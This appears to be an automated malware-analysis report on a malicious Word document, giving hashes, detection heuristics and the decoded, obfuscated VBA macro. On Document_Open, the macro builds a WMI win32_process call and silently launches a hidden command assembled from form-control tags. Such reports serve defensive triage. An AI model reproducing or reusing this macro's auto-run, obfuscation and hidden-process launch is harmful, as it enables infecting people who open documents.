Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9cfd96b2f4691a2e…

MALICIOUS

Office (OLE)

251.9 KB Created: 2020-01-17 19:13:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: fa1388ca0385891190bce5e0bc7c09de SHA-1: 4074530aeca50aae2563136df527089babf68794 SHA-256: 9cfd96b2f4691a2e8bcbfaa573fd815ccec0c6414927583ff48f2d8622eefcbc
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Generic-7546200-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-7546200-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Dpctrvquowo = GetObject(Otacntpvnn)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8277 bytes
SHA-256: 8d1972f99526095b3a55bd672660629ff7455da915bcd736e510b77e56712c1c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
190 of 304 identifiers look randomly generated (e.g. 'Wpqzhgpqtcwne'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Efferdrq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Kkapcimmcib
End Sub

Attribute VB_Name = "Liyhzkoypfma"
Attribute VB_Base = "0{9EAF311C-2718-452D-A0C8-FA5FE42E91CD}{A1B926CD-2F01-4610-AAFB-2667E6E9D565}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Mojacpyniebzf"
Function Uizzoslddbphd()
   Select Case Utpetecknx
      Case Dqoulumteo
         Hnldhwcv = 7
         Earvwczdeeqc = Atn(4)
         Gpnnwrhghlwfs = Sin(Rvevmloc)
      Case Kubkhmfplwrjo
         Kxsgyrjaznjmg = Log(3)
         Snxpmxfwayr = 6
         Cmhgfxbnv = CSng(Gatbwxzydxed)
      Case Maebshhbcynfc
         Kzwrfilddz = ChrW(Tljxiuisxwmdo)
         Yvorvrpty = 1
         Gqawbbpjop = Cos(Ekuplnmt)
End Select
Xkitwdsxnv = ChrW(wdKeyP)
   Select Case Jckyesnkijkyg
      Case Qbyjlijtt
         Zhiawowjdcsh = 7
         Ypteshxldc = Atn(4)
         Cgpajqbk = Sin(Bhnwcxxey)
      Case Amtppapwnegwt
         Tdtbfopsnlq = Log(3)
         Aozdkebtw = 6
         Qlofbvltjmdt = CSng(Nklufeyekwzec)
      Case Lwxtzkuakqs
         Mswuofwtqzqgv = ChrW(Sfwszeyq)
         Lmtkadne = 1
         Szfqwpvuwgmd = Cos(Hftzasncqudt)
End Select
Xrpnoikzydum = Xkitwdsxnv + Liyhzkoypfma.Ascdvumitfenw + Liyhzkoypfma.Eoztejoiiemfn
   Select Case Roqxknavfs
      Case Zlhkqolyoqfq
         Smkrudxukr = 7
         Elkunrkcslp = Atn(4)
         Irzvaiad = Sin(Okoyaueapgbj)
      Case Ucofqthxwpl
         Zjiekgqvjzski = Log(3)
         Zhzzqkayuu = 6
         Nqnymnwfq = CSng(Rckskcvv)
      Case Wxpqmwnyl
         Xcdewbfwmh = ChrW(Eixgrqvzyeyr)
         Iarihfsttzgno = 1
         Zwybdlhppvi = Cos(Ktellxtfeda)
End Select
losd = Liyhzkoypfma.Ofrxmena.GroupName
Tfnnlhmaf = Split(Xrpnoikzydum + LTrim(losd), "//====dsfnnJJJsm388//=")
   Select Case Wpqzhgpqtcwne
      Case Pmqwkehw
         Hwjaqujgxgzl = 7
         Ewjkmfpireez = Atn(4)
         Ivotofajfqdhn = Sin(Qedhwroux)
      Case Eyffvqpnycrfx
         Vqthfribazas = Log(3)
         Ubrjqbbd = 6
         Mraieyzghdwx = CSng(Egvxffvxhid)
      Case Whysrpzvnqaxc
         Lfhwacfjgeyu = ChrW(Krecydzjkfi)
         Rpuzcebmcbha = 1
         Xrotuzgdywu = Cos(Ubucozhoulevq)
End Select
Uizzoslddbphd = Tnakagfgnfgdi + Join(Tfnnlhmaf, "") + Tnakagfgnfgdi
   Select Case Irdwcaskbv
      Case Vqvrrbtykbs
         Itolzndppj = 7
         Nhyscmmruwtev = Atn(4)
         Uczgzgmtheyc = Sin(Zfhiueuuf)
      Case Gfpmzkqutim
         Mqanrodk = Log(3)
         Uqmvaazaxr = 6
         Bwhhuihpwnpe = CSng(Dgdreectu)
      Case Ppttipyktpe
         Uucophahyw = ChrW(Xgnnqhcmteto)
         Yrucpzztwjb = 1
         Nugqswbl = Cos(Xdhbuppbos)
End Select
End Function
Function Kkapcimmcib()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Liyhzkoypfma.Bnsaodxiii + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
   Select Case Upumvpzkxekc
      Case Irybjkbwl
         Gxnovzcxggkb = 7
         Ecgavqkz = Atn(4)
         Ghbbutyeyr = Sin(Mvbeieuzxqmy)
      Case Uvqfkgbbi
         Acnhgcunmpkzq = Log(3)
         Ewopucvmy = 6
         Shjqlnmfhbh = CSng(Nsktskwzwdb)
      Case Stvfqoeskm
         Ewmkbexdxbcrc = ChrW(Govdhlyutkb)
         Nxdfgxnnkouz = 1
         Orrddvax = Cos(Jwkfctazsep)
End Select
E = "//====dsfnnJJJsm388//="
   Select Case Uopbqqll
      Case Tteplijtsfojw
         Ircanjhaz = 7
         Qikkhncfsm = Atn(4)
         Mmbnvvnlsxt = Sin(Ilzpmteyarajh)
      Case Gqzvqeqn
         Lemfstpclycdp = Log(3)
         Nomubenxnebx = 6
         Usxotaosshyl = CSng(Zydbsddpdskry)
      Case Arvskqgeowgdu
         Wqwryobaf = ChrW(Foedbchtrqc)
         Gstofmzitzwuv = 1
         Kzqqywlsz = Cos(Ewaeouxzlgvn)
End Select
Muqlomgandy = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
   Select Case Qewrvwfwn
      Case Nmsezjockz
         Kwkoviyi = 7
         Khriprotbh = Atn(4)
         Zfsqytntnhuz = Sin(Khjnotxbbkmq)
      Case Orxoxrxfwfkfu
         Dnrxuhgjnsnvx = Log(3)
         Dhzqfwjfc = 6
         Eledjyddxwvtz = CSng(Ikwkwzboc)
      Case Eocuipdwd
         Kiosuglin = ChrW(Xnzirxyc)
         Zeupbdof = 1
         Mmdznvee = Cos(Tpfdqovz)
End Select
Otacntpvnn = Join(Muqlomgandy, "")
   Select Case Atimkevdrjh
      Case Xxeazver
         Vmsiwtisc = 7
         Dkygwqsnlnb = Atn(4)
         Wtemnvmzm = Sin(Aswzjirefq)
      Case Gtcfmddvuql
         Pwehwoqz = Log(3)
         Ettecvxpr = 6
         Xskqawjpr = CSng(Kwtmmxibd)
      Case Oxlsyazxbtjw
         Uqwrhjuv = ChrW(Wlpjahpyrd)
         Ehyiquimbzb = 1
         Gmkwfaszcwnl = Cos(Telfozglotytz)
End Select
Set Dpctrvquowo = GetObject(Otacntpvnn)
   Select Case Thwrzhlcvi
      Case Dbkeskhubqci
         Itlcubmod = 7
         Ibznfrxke = Atn(4)
         Ybhrnyidenx = Sin(Srsogioydxjii)
      Case Zfypotujucnof
         Tliaunyj = Log(3)
         Dqveyifrmdzph = 6
         Xhxlsuixb = CSng(Ahmjawttldzew)
      Case Xtwceddvx
         Xmbusubz = ChrW(Edddvotbydbrk)
         Byzuxmodzyh = 1
         Ledwmksqtyi = Cos(Uzcagbegqv)
End Select
Jzklgxlwwks = Liyhzkoypfma.Byefsmbyxsqlk.Tag
Qnsnlcdzxlg = Otacntpvnn + ChrW(wdKeyS) + Liyhzkoypfma.Kjhbiofihigx.Tag + Jzklgxlwwks
   Select Case Prfecrlhmk
      Case Vdjzzwbqqp
         Hpbbvetrixj = 7
         Yzphykcucouuq = Atn(4)
         Avwaepwmqjli = Sin(Bxuodbxljrfl)
      Case Bghfzbrna
         Gbmzxmblybq = Log(3)
         Nduplevtu = 6
         Jcgioenxly = CSng(Kmlfdzwd)
      Case Brwhbbwnw
         Bpvgswunto = ChrW(Ckcazstxpad)
         Mhcmbyblrix = 1
         Kdcprrtctxzbw = Cos(Otalurgo)
End Select
Ilngufnacbk = Qnsnlcdzxlg + Liyhzkoypfma.Bnsaodxiii
   Select Case Mddrljdpjvy
      Case Hovczfcijhk
         Updpfxfvuej = 7
         Cposqlaul = Atn(4)
         Mjmfhcwtlwp = Sin(Upaftmklar)
      Case Urryfviood
         Zoriqqlncb = Log(3)
         Luazqels = 6
         Mlevfahzyqup = CSng(Vbujfpktt)
      Case Lujykrdcgbg
         Llgddhgvovdp = ChrW(Mtitrohu)
         Aozqmaeoxzyuj = 1
         Mjrwzfiapri = Cos(Opnrficpi)
End Select
Set Kkapcimmcib = GetObject(Ilngufnacbk)
   Select Case Ynnpmvzfedxo
      Case Rqxrbcgzp
         Njebpzgd = 7
         Limvzdwgeq = Atn(4)
         Tfgcndpk = Sin(Inymudoerldwf)
      Case Vczkslotlp
         Nldnnmmzzwni = Log(3)
         Azxxxzxrsbqa = 6
         Utnwwiasnxq = CSng(Ilyorralovns)
      Case Vtcxngzffjqll
         Mahnhoftm = ChrW(Fbfxzexkfy)
         Cdtdgpxfgjdcv = 1
         Ripapyeay = Cos(Kmnaljaae)
End Select
Kkapcimmcib. _
showwindow = False
   Select Case Mkpqxwddeuvx
      Case Fvxjheiix
         Lesrzwdmw = 7
         Oiezsuublwot = Atn(4)
         Cyqpndnnll = Sin(Leyrkclngp)
      Case Mnowqjxkn
         Xnxjqebxtihjp = Log(3)
         Llhrentidzpr = 6
         Ngxeiaen = CSng(Ifsmzfeytwxl)
      Case Cieeukbndvfbk
         Coytmjzuh = ChrW(Vrxbdcdbbzwzt)
         Vbxhyuzrqhzs = 1
         Doxwwpkpcr = Cos(Jchgoelsnxxak)
End Select
Do While Dpctrvquowo. _
Create(pok & Uizzoslddbphd, Olxakeefrmijs, Kkapcimmcib, Bzgggmozdtb)
Loop
   Select Case Qsmrrsndhnoor
      Case Bcbvtmheotemb
         Dsjjhzjsagds = 7
         Pcyjwapddgljn = Atn(4)
         Mflzokvehayrk = Sin(Qunizrgcfdd)
      Case Dyylmuoarsf
         Xrjxjfcoprvf = Log(3)
         Gcgvkkgbi = 6
         Fpmoybiwgt = CSng(Iuyxangdgooi)
      Case Xubnwihkeq
         Rqmirmrj = ChrW(Mmgnczgq)
         Qndovtxgl = 1
         Ihavqqxxbqo = Cos(Iohigidopljen)
End Select
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.